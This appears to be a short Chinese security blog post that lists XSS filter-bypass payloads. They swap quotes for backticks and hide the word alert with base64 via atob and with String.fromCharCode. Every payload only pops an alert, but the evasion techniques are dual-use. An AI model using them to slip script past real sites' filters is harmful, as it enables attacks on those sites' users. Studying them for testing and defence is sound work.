XSS绕过
引号绕过
反引号
原payload
1 | <svg onload=alert('xss')> |
绕过payload
1 | <svg onload=alert(`xss`)> |
不使用引号
原payload
1 | <svg onload=alert('xss')> |
绕过payload
1 | <script>alert(123)</script> |
关键字绕过
alert绕过
1 | <script>eval(atob`YWxlcnQoMSk=`)</script> |
1 | <script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script> |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 狐狸小镇!
